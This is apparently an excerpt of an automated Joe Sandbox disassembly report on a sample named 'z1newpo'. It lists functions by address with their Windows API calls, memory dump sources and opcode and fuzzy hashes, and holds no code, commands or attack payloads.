                                                    Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                    Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                    • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                    • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                    • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                    Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                    Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                    • __itow.LIBCMT ref: 004699CD
                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                    • __itow.LIBCMT ref: 00469A97
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                    Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                    Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                    • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                    Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                    Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                    Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                    Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 004503C8
                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Proc$Parent
                                                    • String ID:
                                                    • API String ID: 2351499541-0
                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                    Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                    Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                    Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                    • _wcslen.LIBCMT ref: 00449519
                                                    • _wcslen.LIBCMT ref: 00449526
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 2886238975-0
                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                    Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                    • String ID:
                                                    • API String ID: 1792727568-0
                                                    • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                    • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                    Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
